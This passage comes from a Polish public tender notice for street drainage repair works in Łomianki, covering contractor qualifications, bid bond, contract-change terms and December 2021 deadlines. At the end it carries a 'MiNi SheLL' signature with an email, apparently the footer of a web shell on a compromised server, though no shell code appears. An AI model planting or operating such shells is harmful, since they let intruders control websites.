roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty.<br/> 4) Wykazu robót budowlanych w których Wykonawca wykaże, że wykonał<br/>należycie dwie roboty budowlane polegające na wykonaniu modernizacji lub remontu odwodnienia ulicznego o wartości co najmniej 50 000,00 zł brutto (pięćdziesiąt tysięcy złotych 00/100) w przypadku każdej z tych robót,<br/>nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty.<br/>5) Wykazu osób w którym Wykonawca wykaże jedną osobę posiadającą uprawienia do sprawowania samodzielnych funkcji w budownictwie do kierowania robotami budowlanymi w specjalności sanitarnej i należąca do właściwej Izby Samorządu Zawodowego (lub równoważne do ww.<br/>wydawane na podstawie przepisów obowiązujących w innych państwach), skierowaną przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnej za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat jej kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do<br/>wykonania zamówienia publicznego, a także zakresu wykonywanych przez nią czynności oraz informacją o podstawie do dysponowania tą osobą.<br/>6) Wykazu narzędzi dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami,<br/>w którym Wykonawca wykaże, że na okres realizacji zamówienia będzie dysponował narzędziami typu:<br/>pojazd próżniowo-ssący – 1 szt., łopaty – 2 szt., szufle – 2 szt., wiadra – 2 szt., pojazd z urządzeniem ssąco-tłoczącym do ciśnieniowego czyszczenia przewodów kanalizacyjnych – 1 szt., koparka – 1szt., samochód samowyławdowawczy - 1szt., kamera inspekcyjna – 1 szt.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 9 700,00 zł (słownie: dziewięć tysięcy siedemset złotych 00/100) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zakazuje się istotnych zmian postanowień umowy w stosunku do treści oferty,<br/>na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem zapisów wskazanych w<br/>niniejszym paragrafie.<br/>2. Zamawiający przewiduje możliwość dokonania zmian umowy, w następujących<br/>okolicznościach:<br/>1) w przypadku zmiany przepisów prawa bezpośrednio związanych z przedmiotem umowy –<br/>dopuszczalna jest taka zmiana umowy, która umożliwi dostosowanie postanowień niniejszej<br/>umowy do nowych przepisów prawa,<br/>2) w przypadku wystąpienia okoliczności wskazanych w art. 455 ust 1 pkt 3) ustawy pzp<br/>dotyczących realizacji przez dotychczasowego wykonawcę dodatkowych robót budowlanych,<br/>których nie uwzględniono w zamówieniu podstawowym, o ile stały się<br/>one niezbędne i zostały spełnione łącznie następujące warunki:<br/>a) zmiana wykonawcy nie może zostać dokonana z powodów ekonomicznych<br/>lub technicznych, w szczególności dotyczących zamienności lub interoperacyjności<br/>wyposażenia, usług lub instalacji zamówionych w ramach zamówienia podstawowego,<br/>b) zmiana wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów<br/>dla zamawiającego,<br/>3. Dopuszcza się zmianę której konieczność spowodowana jest okolicznościami, których zamawiający, działając z należytą starannością nie mógł przewidzieć, o ile zmiana<br/>nie modyfikuje ogólnego charakteru umowy a wzrost ceny spowodowany każdą kolejną zmianą<br/>nie przekracza 50% wartości pierwotnej umowy.<br/>4. Dopuszcza się również zmiany umowy bez przeprowadzenia nowego postępowania<br/>o udzielenie zamówienia, których łączna wartość jest mniejsza niż progi unijne<br/>oraz jest niższa niż 15% wartości zawartej umowy, a zmiany te nie powodują zmiany ogólnego<br/>charakteru umowy.<br/>5. Zamawiający dopuszcza zmianę terminu wykonania przedmiotu umowy i zleceń częściowych<br/>lub zawieszenie terminu realizacji zamówienia w przypadku wystąpienia opóźnień wynikających<br/>z:<br/>1) wystąpienia warunków atmosferycznych oraz ich skutków, uniemożliwiających prowadzenie<br/>robót zgodnie ze specyfikacjami technicznymi wykonania i odbioru robót budowlanych.<br/>wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć w chwili zawarcia<br/>umowy pomimo zachowania należytej staranności,<br/>2) zlecenia Wykonawcy robót o których mowa w ust.2 pkt 2) niniejszego paragrafu.<br/>6. Fakt wystąpienia okoliczności o których mowa w ust.5 pkt 1) i 2) musi być potwierdzony<br/>w notatce służbowej wpisem dokonanym przez przedstawiciela Wykonawcy potwierdzonym<br/>przez przedstawiciela Zamawiającego.<br/>7. W przedstawionych w ust.5 pkt 1), 2) przypadkach wystąpienia opóźnień strony ustalą nowy<br/>termin realizacji, przy czym minimalny okres przesunięcia terminu zakończenia robót będzie<br/>równy okresowi zawieszenia.<br/>8. Zawieszenie, o którym mowa w ust. 5 zostaje zniesione w przypadku ustania okoliczności<br/>powodujących jego zaistnienie. Fakt ustania okoliczności, o których mowa w ust. 5 musi być<br/>potwierdzony notatką sporządzoną przez Wykonawcę i potwierdzoną przez Zamawiającego.<br/>9. Gdy nowy wykonawca ma zastąpić dotychczasowego wykonawcę:<br/>1) w wyniku sukcesji, wstępując w prawa i obowiązki wykonawcy, w następstwie przejęcia, po łączenia, podziału, przekształcenia, upadłości, restrukturyzacji, dziedziczenia lub nabycia<br/>dotychczasowego wykonawcy lub jego przedsiębiorstwa,<br/>o ile nowy wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego<br/>podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy, a także nie<br/>ma na celu uniknięcia stosowania przepisów ustawy, lub<br/>2) w wyniku przejęcia przez zamawiającego zobowiązań wykonawcy względem<br/>jego podwykonawców, w przypadku, o którym mowa w art. 465 ust. 1;<br/>10. Zmiany umowy wymagają formy pisemnej w postaci aneksu podpisanego<br/>przez strony pod rygorem nieważności.<br/>11. Nie wymagają zachowania formy pisemnej poniższe zmiany Umowy, a zostaną dokonane<br/>poprzez pisemne zgłoszenie potwierdzone przez drugą stronę Umowy:<br/>1) zmiana adresu Wykonawcy,<br/>2) zmiana adresu Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Poprzez Platformę dostępną pod adresem: https://platformazakupowa.pl/pn/lomianki</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-07 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-05</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com